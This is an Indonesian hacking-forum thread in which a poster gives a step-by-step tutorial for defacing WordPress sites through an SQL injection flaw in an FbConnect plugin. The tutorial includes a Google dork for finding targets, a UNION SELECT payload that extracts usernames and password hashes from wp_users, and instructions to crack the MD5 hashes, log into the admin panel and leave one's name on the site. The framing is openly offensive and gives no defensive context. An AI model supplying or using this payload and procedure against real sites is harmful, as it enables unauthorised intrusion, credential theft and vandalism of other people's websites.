☣ Probolinggo Cyber Crew ☣



 
CalendarIndeksGalleryFAQPencarianAnggotaGroupPendaftaranLogin
Welcome
Top posters
Aurelya666 (35)
 
Mr.XSecr3t (23)
 
Tux|Anonymous (18)
 
M1nD-Fr34Kz (18)
 
C404_Cyber (17)
 
PCC_AKVL48 (13)
 
404.reboot (12)
 
wong deso (8)
 
"Ms.Green" (6)
 
izza_009 (5)
 
Latest topics
Pro-Cyber Crew
PCC Team
We Are Anonymous
free forum

User Yang Sedang Online
Total 2 uses online :: 0 Terdaftar, 0 Tersembunyi dan 2 Tamu

Tidak ada

User online terbanyak adalah 16 pada Thu Jan 01, 2015 10:15 am

Share | 
 

 Deface Dnegan FbConnect INJECTION Vulnerability

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Mr.XSecr3t
Family
Family
avatar

Jumlah posting : 23
Cendol : -1
Join date : 22.05.15
Age : 26
Lokasi : Unknown Syntax Error!'

PostSubyek: Deface Dnegan FbConnect INJECTION Vulnerability   Wed May 27, 2015 9:55 pm

Hello ...Probolinggo Cyber Crew ...
mau Berbagi ILMU nih ... Very Happy

berhubung lagi mau berbagi ..
langsung aja deh yaa disimak tutorialnya Razz
pada dasarnya tutorial ini sama layaknya seperti SQL Manual
namun beda nya ini menggunakan Kelemahan BUG Profile Facebook Pengunjung!

LANGSUNG DISIMAK AJA DEH YAA !!!
KE TKP

1.Dork :
inurl:"fbconnect_action=myhome" (kembangin lagi .. tambahin site:com/terserah situ maunya negara mana)
maka akan muncul tampilan banyak tuh ... yang dibelakang URL websitenya ada link sama kya dork Razz (?fbconnect blablabla)
langsung klik aja ...
kalau VULN akan Seperti ini :
liat GAMBAR


kalau udah kya gitu
EXPLOIT Dengan ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--
Kalau MUNCUL kya GAMBAR Dibawah ini
http://2.bp.blogspot.com/-P-JKGHYUQ-0/Ux32nvBZIrI/AAAAAAAAAps/iqL8xwIdAM8/s1600/Screenshot+from+2014-03-11+01:29:50.png

maka Kalian SUKSES!! tinggal Eksekusi saja yakni dengan Mengcrack Dah tuh password berbentuk MD5 Razz
kalau udah sukses Di Decrypte tinggal LOGIN deh ke panel adminnya yakni di http://www.situstarget.com/wp-login.php Razz

Dan Dicoba SUKSES!!!

okee sekian TUTOR dari ane nih ...
kurang jelas ?COMENT aja Nanti Di jawab Razz

NITIP Nama Yak kalau sukses!! Razz

COPAS?Sertakan Sumbernya Smile hargai karya orang lain bung


Mr.XSecr3t lol! lol! lol!
Kembali Ke Atas Go down
Lihat profil user http://taufikict.blogspot.com
Aurelya666
Family
Family
avatar

Jumlah posting : 35
Cendol : 0
Join date : 26.08.15
Age : 37
Lokasi : Yogyakarta

PostSubyek: Re: Deface Dnegan FbConnect INJECTION Vulnerability   Wed Aug 26, 2015 5:20 pm

Basketball Basketball Basketball Basketball

_______________________________________________________________________________________
We Can Do What You Can't Do !!
Kembali Ke Atas Go down
Lihat profil user http://inj3ct0r666.blogspot.com/
 
Deface Dnegan FbConnect INJECTION Vulnerability
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Injection Open Loop vs Close Loop
» WATER INJECTION (WAI) FOR N250R
» N250 Fuel injection Kit PNP
» (Ask) Ninja 250 Injection vs. Carbu
» Knalpot R9 Ninja 250 Injection 2013

Permissions in this forum:Anda tidak dapat menjawab topik
☣ Probolinggo Cyber Crew ☣ :: Hacking , Cracking , dsb :: Hacking , Cracking , dsb :: Tutorials-
Navigasi: